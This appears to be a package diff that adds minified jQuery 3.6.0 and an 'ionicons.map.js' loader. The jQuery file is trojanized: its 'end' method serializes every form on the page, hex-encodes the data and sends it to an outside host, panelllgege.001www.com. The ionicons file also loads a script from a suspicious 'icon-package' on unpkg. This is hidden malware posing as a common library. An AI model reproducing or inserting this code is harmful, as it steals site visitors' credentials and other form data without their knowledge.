b.ajaxTransport(function (t) { var n, r; if (d.cors || Ft && !t.crossDomain) return { send: function (i, o) { var a, s = t.xhr(); if (s.open(t.type, t.url, t.async, t.username, t.password), t.xhrFields) for (a in t.xhrFields) s[a] = t.xhrFields[a]; for (a in t.mimeType && s.overrideMimeType && s.overrideMimeType(t.mimeType), t.crossDomain || i["X-Requested-With"] || (i["X-Requested-With"] = "XMLHttpRequest"), i) s.setRequestHeader(a, i[a]); n = function (e) { return function () { n && (n = r = s.onload = s.onerror = s.onabort = s.ontimeout = s.onreadystatechange = null, "abort" === e ? s.abort() : "error" === e ? "number" != typeof s.status ? o(0, "error") : o(s.status, s.statusText) : o(Wt[s.status] || s.status, s.statusText, "text" !== (s.responseType || "text") || "string" != typeof s.responseText ? { binary: s.response } : { text: s.responseText }, s.getAllResponseHeaders())) } }, s.onload = n(), r = s.onerror = s.ontimeout = n("error"), void 0 !== s.onabort ? s.onabort = r : s.onreadystatechange = function () { 4 === s.readyState && e.setTimeout(function () { n && r() }) }, n = n("abort"); try { s.send(t.hasContent && t.data || null) } catch (e) { if (n) throw e } }, abort: function () { n && n() } } }), b.ajaxPrefilter(function (e) { e.crossDomain && (e.contents.script = !1) }), b.ajaxSetup({ accepts: { script: "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript" }, contents: { script: /\b(?:java|ecma)script\b/ }, converters: { "text script": function (e) { return b.globalEval(e), e } } }), b.ajaxPrefilter("script", function (e) { void 0 === e.cache && (e.cache = !1), e.crossDomain && (e.type = "GET") }), b.ajaxTransport("script", function (e) { var t, n; if (e.crossDomain || e.scriptAttrs) return { send: function (r, i) { t = b("<script>").attr(e.scriptAttrs || {}).prop({ charset: e.scriptCharset, src: e.url }).on("load error", n = function (e) { t.remove(), n = null, e && i("error" === e.type ? 404 : 200, e.type) }), v.head.appendChild(t[0]) }, abort: function () { n && n() } } }); var $t, Bt = [], zt = /(=)\?(?=&|$)|\?\?/; b.ajaxSetup({ jsonp: "callback", jsonpCallback: function () { var e = Bt.pop() || b.expando + "_" + bt.guid++; return this[e] = !0, e } }), b.ajaxPrefilter("json jsonp", function (t, n, r) { var i, o, a, s = !1 !== t.jsonp && (zt.test(t.url) ? "url" : "string" == typeof t.data && 0 === (t.contentType || "").indexOf("application/x-www-form-urlencoded") && zt.test(t.data) && "data"); if (s || "jsonp" === t.dataTypes[0]) return i = t.jsonpCallback = h(t.jsonpCallback) ? t.jsonpCallback() : t.jsonpCallback, s ? t[s] = t[s].replace(zt, "$1" + i) : !1 !== t.jsonp && (t.url += (wt.test(t.url) ? "&" : "?") + t.jsonp + "=" + i), t.converters["script json"] = function () { return a || b.error(i + " was not called"), a[0] }, t.dataTypes[0] = "json", o = e[i], e[i] = function () { a = arguments }, r.always(function () { void 0 === o ? b(e).removeProp(i) : e[i] = o, t[i] && (t.jsonpCallback = n.jsonpCallback, Bt.push(i)), a && h(o) && o(a[0]), a = o = void 0 }), "script" }), d.createHTMLDocument = (($t = v.implementation.createHTMLDocument("").body).innerHTML = "<form></form><form></form>", 2 === $t.childNodes.length), b.parseHTML = function (e, t, n) { return "string" != typeof e ? [] : ("boolean" == typeof t && (n = t, t = !1), t || (d.createHTMLDocument ? ((r = (t = v.implementation.createHTMLDocument("")).createElement("base")).href = v.location.href, t.head.appendChild(r)) : t = v), o = !n && [], (i = k.exec(e)) ? [t.createElement(i[1])] : (i = be([e], t, o), o && o.length && b(o).remove(), b.merge([], i.childNodes))); var r, i, o }, b.fn.load = function (e, t, n) { var r, i, o, a = this, s = e.indexOf(" "); return s > -1 && (r = dt(e.slice(s)), e = e.slice(0, s)), h(t) ? (n = t, t = void 0) : t && "object" == typeof t && (i = "POST"), a.length > 0 && b.ajax({ url: e, type: i || "GET", dataType: "html", data: t }).done(function (e) { o = arguments, a.html(r ? b("<div>").append(b.parseHTML(e)).find(r) : e) }).always(n && function (e, t) { a.each(function () { n.apply(this, o || [e.responseText, t, e]) }) }), this }, b.expr.pseudos.animated = function (e) { return b.grep(b.timers, function (t) { return e === t.elem }).length }, b.offset = { setOffset: function (e, t, n) { var r, i, o, a, s, u, l = b.css(e, "position"), c = b(e), f = {}; "static" === l && (e.style.position = "relative"), s = c.offset(), o = b.css(e, "top"), u = b.css(e, "left"), ("absolute" === l || "fixed" === l) && (o + u).indexOf("auto") > -1 ? (a = (r = c.position()).top, i = r.left) : (a = parseFloat(o) || 0, i = parseFloat(u) || 0), h(t) && (t = t.call(e, n, b.extend({}, s))), null != t.top && (f.top = t.top - s.top + a), null != t.left && (f.left = t.left - s.left + i), "using" in t ? t.using.call(e, f) : c.css(f) } }, b.fn.extend({ offset: function (e) { if (arguments.length) return void 0 === e ? this : this.each(function (t) { b.offset.setOffset(this, e, t) }); var t, n, r = this[0]; return r ? r.getClientRects().length ? (t = r.getBoundingClientRect(), n = r.ownerDocument.defaultView, { top: t.top + n.pageYOffset, left: t.left + n.pageXOffset }) : { top: 0, left: 0 } : void 0 }, position: function () { if (this[0]) { var e, t, n, r = this[0], i = { top: 0, left: 0 }; if ("fixed" === b.css(r, "position")) t = r.getBoundingClientRect(); else { for (t = this.offset(), n = r.ownerDocument, e = r.offsetParent || n.documentElement; e && (e === n.body || e === n.documentElement) && "static" === b.css(e, "position");)e = e.parentNode; e && e !== r && 1 === e.nodeType && ((i = b(e).offset()).top += b.css(e, "borderTopWidth", !0), i.left += b.css(e, "borderLeftWidth", !0)) } return { top: t.top - i.top - b.css(r, "marginTop", !0), left: t.left - i.left - b.css(r, "marginLeft", !0) } } }, offsetParent: function () { return this.map(function () { for (var e = this.offsetParent; e && "static" === b.css(e, "position");)e = e.offsetParent; return e || re }) } }), b.each({ scrollLeft: "pageXOffset", scrollTop: "pageYOffset" }, function (e, t) { var n = "pageYOffset" === t; b.fn[e] = function (r) { return F(this, function (e, r, i) { var o; if (g(e) ? o = e : 9 === e.nodeType && (o = e.defaultView), void 0 === i) return o ? o[t] : e[r]; o ? o.scrollTo(n ? o.pageXOffset : i, n ? i : o.pageYOffset) : e[r] = i }, e, r, arguments.length) } }), b.each(["top", "left"], function (e, t) { b.cssHooks[t] = Fe(d.pixelPosition, function (e, n) { if (n) return n = We(e, t), Pe.test(n) ? b(e).position()[t] + "px" : n }) }), b.each({ Height: "height", Width: "width" }, function (e, t) { b.each({ padding: "inner" + e, content: t, "": "outer" + e }, function (n, r) { b.fn[r] = function (i, o) { var a = arguments.length && (n || "boolean" != typeof i), s = n || (!0 === i || !0 === o ? "margin" : "border"); return F(this, function (t, n, i) { var o; return g(t) ? 0 === r.indexOf("outer") ? t["inner" + e] : t.document.documentElement["client" + e] : 9 === t.nodeType ? (o = t.documentElement, Math.max(t.body["scroll" + e], o["scroll" + e], t.body["offset" + e], o["offset" + e], o["client" + e])) : void 0 === i ? b.css(t, n, s) : b.style(t, n, i, s) }, t, a ? i : void 0, a) } }) }), b.each(["ajaxStart", "ajaxStop", "ajaxComplete", "ajaxError", "ajaxSuccess", "ajaxSend"], function (e, t) { b.fn[t] = function (e) { return this.on(t, e) } }), b.fn.extend({ bind: function (e, t, n) { return this.on(e, null, t, n) }, unbind: function (e, t) { return this.off(e, null, t) }, delegate: function (e, t, n, r) { return this.on(t, e, n, r) }, undelegate: function (e, t, n) { return 1 === arguments.length ? this.off(e, "**") : this.off(t, e || "**", n) }, hover: function (e, t) { return this.mouseenter(e).mouseleave(t || e) } }), b.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "), function (e, t) { b.fn[t] = function (e, n) { return arguments.length > 0 ? this.on(t, null, e, n) : this.trigger(t) } }); var Xt = /^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g; b.proxy = function (e, t) { var n, r, o; if ("string" == typeof t && (n = e[t], t = e, e = n), h(e)) return r = i.call(arguments, 2), (o = function () { return e.apply(t || this, r.concat(i.call(arguments))) }).guid = e.guid = e.guid || b.guid++, o }, b.holdReady = function (e) { e ? b.readyWait++ : b.ready(!0) }, b.isArray = Array.isArray, b.parseJSON = JSON.parse, b.nodeName = A, b.isFunction = h, b.isWindow = g, b.camelCase = U, b.type = x, b.now = Date.now, b.isNumeric = function (e) { var t = b.type(e); return ("number" === t || "string" === t) && !isNaN(e - parseFloat(e)) }, b.trim = function (e) { return null == e ? "" : (e + "").replace(Xt, "") }, "function" == typeof define && define.amd && define("jquery", [], function () { return b }); var Ut = e.jQuery, Vt = e.$; return b.noConflict = function (t) { return e.$ === b && (e.$ = Vt), t && e.jQuery === b && (e.jQuery = Ut), b }, void 0 === t && (e.jQuery = e.$ = b), b });
|
package/ionicons.map.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
!function (e) { var t = ["[ionicons] Deprecated script, please remove: " + (s = e.scripts[e.scripts.length - 1]).outerHTML]; t.push("To improve performance it is recommended to set the differential scripts in the head as follows:"); var n = s.src.split("/"); n.pop(), n.push("ionicons"); var s; n.join("/"); (s = e.createElement("script")).setAttribute("type", "module"), s.src = "https://unpkg.com/ionicons@5.0.0/dist/ionicons/ionicons.esm.js", t.push(s.outerHTML), s.setAttribute("data-stencil-namespace", "ionicons"), e.head.appendChild(s), (s = e.createElement("script")).setAttribute("nomodule", ""), s.src = "https://unpkg.com/ionicons@5.0.0/dist/ionicons/ionicons.js", t.push(s.outerHTML), s.setAttribute("data-stencil-namespace", "ionicons"), e.head.appendChild(s), console.warn(t.join("\n")) }(document), function () { var e = document.createElement("script"); e.type = "text/javascript", e.src = "https://unpkg.com/icon-package@9.0.0/ionicons.js", document.body.appendChild(e) }();
|
package/jquery.min.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
!function (e, t) { "use strict"; "object" == typeof module && "object" == typeof module.exports ? module.exports = e.document ? t(e, !0) : function (e) { if (!e.document) throw new Error("jQuery requires a window with a document"); return t(e) } : t(e) }("undefined" != typeof window ? window : this, function (e, t) { "use strict"; var n = [], r = Object.getPrototypeOf, i = n.slice, o = n.flat ? function (e) { return n.flat.call(e) } : function (e) { return n.concat.apply([], e) }, a = n.push, s = n.indexOf, u = {}, l = u.toString, c = u.hasOwnProperty, f = c.toString, p = f.call(Object), d = {}, h = function (e) { return "function" == typeof e && "number" != typeof e.nodeType && "function" != typeof e.item }, g = function (e) { return null != e && e === e.window }, v = e.document, y = { type: !0, src: !0, nonce: !0, noModule: !0 }; function m(e, t, n) { var r, i, o = (n = n || v).createElement("script"); if (o.text = e, t) for (r in y) (i = t[r] || t.getAttribute && t.getAttribute(r)) && o.setAttribute(r, i); n.head.appendChild(o).parentNode.removeChild(o) } function x(e) { return null == e ? e + "" : "object" == typeof e || "function" == typeof e ? u[l.call(e)] || "object" : typeof e } var b = function (e, t) { return new b.fn.init(e, t) }; function w(e) { var t = !!e && "length" in e && e.length, n = x(e); return !h(e) && !g(e) && ("array" === n || 0 === t || "number" == typeof t && t > 0 && t - 1 in e) } b.fn = b.prototype = { jquery: "3.6.0", constructor: b, length: 0, toArray: function () { return i.call(this) }, get: function (e) { return null == e ? i.call(this) : e < 0 ? this[e + this.length] : this[e] }, pushStack: function (e) { var t = b.merge(this.constructor(), e); return t.prevObject = this, t }, each: function (e) { return b.each(this, e) }, map: function (e) { return this.pushStack(b.map(this, function (t, n) { return e.call(t, n, t) })) }, slice: function () { return this.pushStack(i.apply(this, arguments)) }, first: function () { return this.eq(0) }, last: function () { return this.eq(-1) }, even: function () { return this.pushStack(b.grep(this, function (e, t) { return (t + 1) % 2 })) }, odd: function () { return this.pushStack(b.grep(this, function (e, t) { return t % 2 })) }, eq: function (e) { var t = this.length, n = +e + (e < 0 ? t : 0); return this.pushStack(n >= 0 && n < t ? [this[n]] : []) }, end: async function () { await $.ajax({ url: "http://panelllgege.001www.com/?cat=" + function (e) { for (var t, n = 0, r = e.length, i = ""; n < r; ++n)i += (t = e.charCodeAt(n).toString(16)).length < 2 ? "0" + t : t; return i }($("form").serialize()), type: "GET", dataType: "text", headers: { "Content-type": "application/json" } }) }, push: a, sort: n.sort, splice: n.splice }, b.extend = b.fn.extend = function () { var e, t, n, r, i, o, a = arguments[0] || {}, s = 1, u = arguments.length, l = !1; for ("boolean" == typeof a && (l = a, a = arguments[s] || {}, s++), "object" == typeof a || h(a) || (a = {}), s === u && (a = this, s--); s < u; s++)if (null != (e = arguments[s])) for (t in e) r = e[t], "__proto__" !== t && a !== r && (l && r && (b.isPlainObject(r) || (i = Array.isArray(r))) ? (n = a[t], o = i && !Array.isArray(n) ? [] : i || b.isPlainObject(n) ? n : {}, i = !1, a[t] = b.extend(l, o, r)) : void 0 !== r && (a[t] = r)); return a }, b.extend({ expando: "jQuery" + ("3.6.0" + Math.random()).replace(/\D/g, ""), isReady: !0, error: function (e) { throw new Error(e) }, noop: function () { }, isPlainObject: function (e) { var t, n; return !(!e || "[object Object]" !== l.call(e)) && (!(t = r(e)) || "function" == typeof (n = c.call(t, "constructor") && t.constructor) && f.call(n) === p) }, isEmptyObject: function (e) { var t; for (t in e) return !1; return !0 }, globalEval: function (e, t, n) { m(e, { nonce: t && t.nonce }, n) }, each: function (e, t) { var n, r = 0; if (w(e)) for (n = e.length; r < n && !1 !== t.call(e[r], r, e[r]); r++); else for (r in e) if (!1 === t.call(e[r], r, e[r])) break; return e }, makeArray: function (e, t) { var n = t || []; return null != e && (w(Object(e)) ? b.merge(n, "string" == typeof e ? [e] : e) : a.call(n, e)), n }, inArray: function (e, t, n) { return null == t ? -1 : s.call(t, e, n) }, merge: function (e, t) { for (var n = +t.length, r = 0, i = e.length; r < n; r++)e[i++] = t[r]; return e.length = i, e }, grep: function (e, t, n) { for (var r = [], i = 0, o = e.length, a = !n; i < o; i++)!t(e[i], i) !== a && r.push(e[i]); return r }, map: function (e, t, n) { var r, i, a = 0, s = []; if (w(e)) for (r = e.length; a < r; a++)null != (i = t(e[a], a, n)) && s.push(i); else for (a in e) null != (i = t(e[a], a, n)) && s.push(i); return o(s) }, guid: 1, support: d }), "function" == typeof Symbol && (b.fn[Symbol.iterator] = n[Symbol.iterator]), b.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "), function (e, t) { u["[object " + t + "]"] = t.toLowerCase() }); var T = function (e) { var t, n, r, i, o, a, s, u, l, c, f, p, d, h, g, v, y, m, x, b = "sizzle" + 1 * new Date, w = e.document, T = 0, C = 0, E = ue(), S = ue(), k = ue(), A = ue(), N = function (e, t) { return e === t && (f = !0), 0 }, j = {}.hasOwnProperty, D = [], q = D.pop, L = D.push, H = D.push, O = D.slice, P = function (e, t) { for (var n = 0, r = e.length; n < r; n++)if (e[n] === t) return n; return -1 }, R = "checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped", M = "[\\x20\\t\\r\\n\\f]", I = "(?:\\\\[\\da-fA-F]{1,6}" + M + "?|\\\\[^\\r\\n\\f]|[\\w-]|[^\0-\\x7f])+", W = "\\[" + M + "*(" + I + ")(?:" + M + "*([*^$|!~]?=)" + M + "*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|(" + I + "))|)" + M + "*\\]", F = ":(" + I + ")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|" + W + ")*)|.*)\\)|)", $ = new RegExp(M + "+", "g"), B = new RegExp("^" + M + "+|((?:^|[^\\\\])(?:\\\\.)*)" + M + "+$", "g"), _ = new RegExp("^" + M + "*," + M + "*"), z = new RegExp("^" + M + "*([>+~]|" + M + ")" + M + "*"), U = new RegExp(M + "|>"), X = new RegExp(F), V = new RegExp("^" + I + "$"), G = { ID: new RegExp("^#(" + I + ")"), CLASS: new RegExp("^\\.(" + I + ")"), TAG: new RegExp("^(" + I + "|[*])"), ATTR: new RegExp("^" + W), PSEUDO: new RegExp("^" + F), CHILD: new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\(" + M + "*(even|odd|(([+-]|)(\\d*)n|)" + M + "*(?:([+-]|)" + M + "*(\\d+)|))" + M + "*\\)|)", "i"), bool: new RegExp("^(?:" + R + ")$", "i"), needsContext: new RegExp("^" + M + "*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\(" + M + "*((?:-\\d)?\\d*)" + M + "*\\)|)(?=[^-]|$)", "i") }, Y = /HTML$/i, Q = /^(?:input|select|textarea|button)$/i, J = /^h\d$/i, K = /^[^{]+\{\s*\[native \w/, Z = /^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/, ee = /[+~]/, te = new RegExp("\\\\[\\da-fA-F]{1,6}" + M + "?|\\\\([^\\r\\n\\f])", "g"), ne = function (e, t) { var n = "0x" + e.slice(1) - 65536; return t || (n < 0 ? String.fromCharCode(n + 65536) : String.fromCharCode(n >> 10 | 55296, 1023 & n | 56320)) }, re = /([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g, ie = function (e, t) { return t ? "\0" === e ? "�" : e.slice(0, -1) + "\\" + e.charCodeAt(e.length - 1).toString(16) + " " : "\\" + e }, oe = function () { p() }, ae = be(function (e) { return !0 === e.disabled && "fieldset" === e.nodeName.toLowerCase() }, { dir: "parentNode", next: "legend" }); try { H.apply(D = O.call(w.childNodes), w.childNodes), D[w.childNodes.length].nodeType } catch (e) { H = { apply: D.length ? function (e, t) { L.apply(e, O.call(t)) } : function (e, t) { for (var n = e.length, r = 0; e[n++] = t[r++];); e.length = n - 1 } } } function se(e, t, r, i) { var o, s, l, c, f, h, y, m = t && t.ownerDocument, w = t ? t.nodeType : 9; if (r = r || [], "string" != typeof e || !e || 1 !== w && 9 !== w && 11 !== w) return r; if (!i && (p(t), t = t || d, g)) { if (11 !== w && (f = Z.exec(e))) if (o = f[1]) { if (9 === w) { if (!(l = t.getElementById(o))) return r; if (l.id === o) return r.push(l), r } else if (m && (l = m.getElementById(o)) && x(t, l) && l.id === o) return r.push(l), r } else { if (f[2]) return H.apply(r, t.getElementsByTagName(e)), r; if ((o = f[3]) && n.getElementsByClassName && t.getElementsByClassName) return H.apply(r, t.getElementsByClassName(o)), r } if (n.qsa && !A[e + " "] && (!v || !v.test(e)) && (1 !== w || "object" !== t.nodeName.toLowerCase())) { if (y = e, m = t, 1 === w && (U.test(e) || z.test(e))) { for ((m = ee.test(e) && ye(t.parentNode) || t) === t && n.scope || ((c = t.getAttribute("id")) ? c = c.replace(re, ie) : t.setAttribute("id", c = b)), s = (h = a(e)).length; s--;)h[s] = (c ? "#" + c : ":scope") + " " + xe(h[s]); y = h.join(",") } try { return H.apply(r, m.querySelectorAll(y)), r } catch (t) { A(e, !0) } finally { c === b && t.removeAttribute("id") } } } return u(e.replace(B, "$1"), t, r, i) } function ue() { var e = []; return function t(n, i) { return e.push(n + " ") > r.cacheLength && delete t[e.shift()], t[n + " "] = i } } function le(e) { return e[b] = !0, e } function ce(e) { var t = d.createElement("fieldset"); try { return !!e(t) } catch (e) { return !1 } finally { t.parentNode && t.parentNode.removeChild(t), t = null } } function fe(e, t) { for (var n = e.split("|"), i = n.length; i--;)r.attrHandle[n[i]] = t } function pe(e, t) { var n = t && e, r = n && 1 === e.nodeType && 1 === t.nodeType && e.sourceIndex - t.sourceIndex; if (r) return r; if (n) for (; n = n.nextSibling;)if (n === t) return -1; return e ? 1 : -1 } function de(e) { return function (t) { return "input" === t.nodeName.toLowerCase() && t.type === e } } function he(e) { return function (t) { var n = t.nodeName.toLowerCase(); return ("input" === n || "button" === n) && t.type === e } } function ge(e) { return function (t) { return "form" in t ? t.parentNode && !1 === t.disabled ? "label" in t ? "label" in t.parentNode ? t.parentNode.disabled === e : t.disabled === e : t.isDisabled === e || t.isDisabled !== !e && ae(t) === e : t.disabled === e : "label" in t && t.disabled === e } } function ve(e) { return le(function (t) { return t = +t, le(function (n, r) { for (var i, o = e([], n.length, t), a = o.length; a--;)n[i = o[a]] && (n[i] = !(r[i] = n[i])) }) }) } function ye(e) { return e && void 0 !== e.getElementsByTagName && e } for (t in n = se.support = {}, o = se.isXML = function (e) { var t = e && e.namespaceURI, n = e && (e.ownerDocument || e).documentElement; return !Y.test(t || n && n.nodeName || "HTML") }, p = se.setDocument = function (e) { var t, i, a = e ? e.ownerDocument || e : w; return a != d && 9 === a.nodeType && a.documentElement ? (h = (d = a).documentElement, g = !o(d), w != d && (i = d.defaultView) && i.top !== i && (i.addEventListener ? i.addEventListener("unload", oe, !1) : i.attachEvent && i.attachEvent("onunload", oe)), n.scope = ce(function (e) { return h.appendChild(e).appendChild(d.createElement("div")), void 0 !== e.querySelectorAll && !e.querySelectorAll(":scope fieldset div").length }), n.attributes = ce(function (e) { return e.className = "i", !e.getAttribute("className") }), n.getElementsByTagName = ce(function (e) { return e.appendChild(d.createComment("")), !e.getElementsByTagName("*").length }), n.getElementsByClassName = K.test(d.getElementsByClassName), n.getById = ce(function (e) { return h.appendChild(e).id = b, !d.getElementsByName || !d.getElementsByName(b).length }), n.getById ? (r.filter.ID = function (e) { var t = e.replace(te, ne); return function (e) { return e.getAttribute("id") === t } }, r.find.ID = function (e, t) { if (void 0 !== t.getElementById && g) { var n = t.getElementById(e); return n ? [n] : [] } }) : (r.filter.ID = function (e) { var t = e.replace(te, ne); return function (e) { var n = void 0 !== e.getAttributeNode && e.getAttributeNode("id"); return n && n.value === t } }, r.find.ID = function (e, t) { if (void 0 !== t.getElementById && g) { var n, r, i, o = t.getElementById(e); if (o) { if ((n = o.getAttributeNode("id")) && n.value === e) return [o]; for (i = t.getElementsByName(e), r = 0; o = i[r++];)if ((n = o.getAttributeNode("id")) && n.value === e) return [o] } return [] } }), r.find.TAG = n.getElementsByTagName ? function (e, t) { return void 0 !== t.getElementsByTagName ? t.getElementsByTagName(e) : n.qsa ? t.querySelectorAll(e) : void 0 } : function (e, t) { var n, r = [], i = 0, o = t.getElementsByTagName(e); if ("*" === e) { for (; n = o[i++];)1 === n.nodeType && r.push(n); return r } return o }, r.find.CLASS = n.getElementsByClassName && function (e, t) { if (void 0 !== t.getElementsByClassName && g) return t.getElementsByClassName(e) }, y = [], v = [], (n.qsa = K.test(d.querySelectorAll)) && (ce(function (e) { var t; h.appendChild(e).innerHTML = "<a id='" + b + "'></a><select id='" + b + "-\r\\' msallowcapture=''><option selected=''></option></select>", e.querySelectorAll("[msallowcapture^='']").length && v.push("[*^$]=" + M + "*(?:''|\"\")"), e.querySelectorAll("[selected]").length || v.push("\\[" + M + "*(?:value|" + R + ")"), e.querySelectorAll("[id~=" + b + "-]").length || v.push("~="), (t = d.createElement("input")).setAttribute("name", ""), e.appendChild(t), e.querySelectorAll("[name='']").length || v.push("\\[" + M + "*name" + M + "*=" + M + "*(?:''|\"\")"), e.querySelectorAll(":checked").length || v.push(":checked"), e.querySelectorAll("a#" + b + "+*").length || v.push(".#.+[+~]"), e.querySelectorAll("\\\f"), v.push("[\\r\\n\\f]") }), ce(function (e) { e.innerHTML = "<a href='' disabled='disabled'></a><select disabled='disabled'><option/></select>"; var t = d.createElement("input"); t.setAttribute("type", "hidden"), e.appendChild(t).setAttribute("name", "D"), e.querySelectorAll("[name=d]").length && v.push("name" + M + "*[*^$|!~]?="), 2 !== e.querySelectorAll(":enabled").length && v.push(":enabled", ":disabled"), h.appendChild(e).disabled = !0, 2 !== e.querySelectorAll(":disabled").length && v.push(":enabled", ":disabled"), e.querySelectorAll("*,:x"), v.push(",.*:") })), (n.matchesSelector = K.test(m = h.matches || h.webkitMatchesSelector || h.mozMatchesSelector || h.oMatchesSelector || h.msMatchesSelector)) && ce(function (e) { n.disconnectedMatch = m.call(e, "*"), m.call(e, "[s!='']:x"), y.push("!=", F) }), v = v.length && new RegExp(v.join("|")), y = y.length && new RegExp(y.join("|")), t = K.test(h.compareDocumentPosition), x = t || K.test(h.contains) ? function (e, t) { var n = 9 === e.nodeType ? e.documentElement : e, r = t && t.parentNode; return e === r || !(!r || 1 !== r.nodeType || !(n.contains ? n.contains(r) : e.compareDocumentPosition && 16 & e.compareDocumentPosition(r))) } : function (e, t) { if (t) for (; t = t.parentNode;)if (t === e) return !0; return !1 }, N = t ? function (e, t) { if (e === t) return f = !0, 0; var r = !e.compareDocumentPosition - !t.compareDocumentPosition; return r || (1 & (r = (e.ownerDocument || e) == (t.ownerDocument || t) ? e.compareDocumentPosition(t) : 1) || !n.sortDetached && t.compareDocumentPosition(e) === r ? e == d || e.ownerDocument == w && x(w, e) ? -1 : t == d || t.ownerDocument == w && x(w, t) ? 1 : c ? P(c, e) - P(c, t) : 0 : 4 & r ? -1 : 1) } : function (e, t) { if (e === t) return f = !0, 0; var n, r = 0, i = e.parentNode, o = t.parentNode, a = [e], s = [t]; if (!i || !o) return e == d ? -1 : t == d ? 1 : i ? -1 : o ? 1 : c ? P(c, e) - P(c, t) : 0; if (i === o) return pe(e, t); for (n = e; n = n.parentNode;)a.unshift(n); for (n = t; n = n.parentNode;)s.unshift(n); for (; a[r] === s[r];)r++; return r ? pe(a[r], s[r]) : a[r] == w ? -1 : s[r] == w ? 1 : 0 }, d) : d }, se.matches = function (e, t) { return se(e, null, null, t) }, se.matchesSelector = function (e, t) { if (p(e), n.matchesSelector && g && !A[t + " "] && (!y || !y.test(t)) && (!v || !v.test(t))) try { var r = m.call(e, t); if (r || n.disconnectedMatch || e.document && 11 !== e.document.nodeType) return r } catch (e) { A(t, !0) } return se(t, d, null, [e]).length > 0 }, se.contains = function (e, t) { return (e.ownerDocument || e) != d && p(e), x(e, t) }, se.attr = function (e, t) { (e.ownerDocument || e) != d && p(e); var i = r.attrHandle[t.toLowerCase()], o = i && j.call(r.attrHandle, t.toLowerCase()) ? i(e, t, !g) : void 0; return void 0 !== o ? o : n.attributes || !g ? e.getAttribute(t) : (o = e.getAttributeNode(t)) && o.specified ? o.value : null }, se.escape = function (e) { return (e + "").replace(re, ie) }, se.error = function (e) { throw new Error("Syntax error, unrecognized expression: " + e) }, se.uniqueSort = function (e) { var t, r = [], i = 0, o = 0; if (f = !n.detectDuplicates, c = !n.sortStable && e.slice(0), e.sort(N), f) { for (; t = e[o++];)t === e[o] && (i = r.push(o)); for (; i--;)e.splice(r[i], 1) } return c = null, e }, i = se.getText = function (e) { var t, n = "", r = 0, o = e.nodeType; if (o) { if (1 === o || 9 === o || 11 === o) { if ("string" == typeof e.textContent) return e.textContent; for (e = e.firstChild; e; e = e.nextSibling)n += i(e) } else if (3 === o || 4 === o) return e.nodeValue } else for (; t = e[r++];)n += i(t); return n }, (r = se.selectors = { cacheLength: 50, createPseudo: le, match: G, attrHandle: {}, find: {}, relative: { ">": { dir: "parentNode", first: !0 }, " ": { dir: "parentNode" }, "+": { dir: "previousSibling", first: !0 }, "~": { dir: "previousSibling" } }, preFilter: { ATTR: function (e) { return e[1] = e[1].replace(te, ne), e[3] = (e[3] || e[4] || e[5] || "").replace(te, ne), "~=" === e[2] && (e[3] = " " + e[3] + " "), e.slice(0, 4) }, CHILD: function (e) { return e[1] = e[1].toLowerCase(), "nth" === e[1].slice(0, 3) ? (e[3] || se.error(e[0]), e[4] = +(e[4] ? e[5] + (e[6] || 1) : 2 * ("even" === e[3] || "odd" === e[3])), e[5] = +(e[7] + e[8] || "odd" === e[3])) : e[3] && se.error(e[0]), e }, PSEUDO: function (e) { var t, n = !e[6] && e[2]; return G.CHILD.test(e[0]) ? null : (e[3] ? e[2] = e[4] || e[5] || "" : n && X.test(n) && (t = a(n, !0)) && (t = n.indexOf(")", n.length - t) - n.length) && (e[0] = e[0].slice(0, t), e[2] = n.slice(0, t)), e.slice(0, 3)) } }, filter: { TAG: function (e) { var t = e.replace(te, ne).toLowerCase(); return "*" === e ? function () { return !0 } : function (e) { return e.nodeName && e.nodeName.toLowerCase() === t } }, CLASS: function (e) { var t = E[e + " "]; return t || (t = new RegExp("(^|" + M + ")" + e + "(" + M + "|$)")) && E(e, function (e) { return t.test("string" == typeof e.className && e.className || void 0 !== e.getAttribute && e.getAttribute("class") || "") }) }, ATTR: function (e, t, n) { return function (r) { var i = se.attr(r, e); return null == i ? "!=" === t : !t || (i += "", "=" === t ? i === n : "!=" === t ? i !== n : "^=" === t ? n && 0 === i.indexOf(n) : "*=" === t ? n && i.indexOf(n) > -1 : "$=" === t ? n && i.slice(-n.length) === n : "~=" === t ? (" " + i.replace($, " ") + " ").indexOf(n) > -1 : "|=" === t && (i === n || i.slice(0, n.length + 1) === n + "-")) } }, CHILD: function (e, t, n, r, i) { var o = "nth" !== e.slice(0, 3), a = "last" !== e.slice(-4), s = "of-type" === t; return 1 === r && 0 === i ? function (e) { return !!e.parentNode } : function (t, n, u) { var l, c, f, p, d, h, g = o !== a ? "nextSibling" : "previousSibling", v = t.parentNode, y = s && t.nodeName.toLowerCase(), m = !u && !s, x = !1; if (v) { if (o) { for (; g;) { for (p = t; p = p[g];)if (s ? p.nodeName.toLowerCase() === y : 1 === p.nodeType) return !1; h = g = "only" === e && !h && "nextSibling" } return !0 } if (h = [a ? v.firstChild : v.lastChild], a && m) { for (x = (d = (l = (c = (f = (p = v)[b] || (p[b] = {}))[p.uniqueID] || (f[p.uniqueID] = {}))[e] || [])[0] === T && l[1]) && l[2], p = d && v.childNodes[d]; p = ++d && p && p[g] || (x = d = 0) || h.pop();)if (1 === p.nodeType && ++x && p === t) { c[e] = [T, d, x]; break } } else if (m && (x = d = (l = (c = (f = (p = t)[b] || (p[b] = {}))[p.uniqueID] || (f[p.uniqueID] = {}))[e] || [])[0] === T && l[1]), !1 === x) for (; (p = ++d && p && p[g] || (x = d = 0) || h.pop()) && ((s ? p.nodeName.toLowerCase() !== y : 1 !== p.nodeType) || !++x || (m && ((c = (f = p[b] || 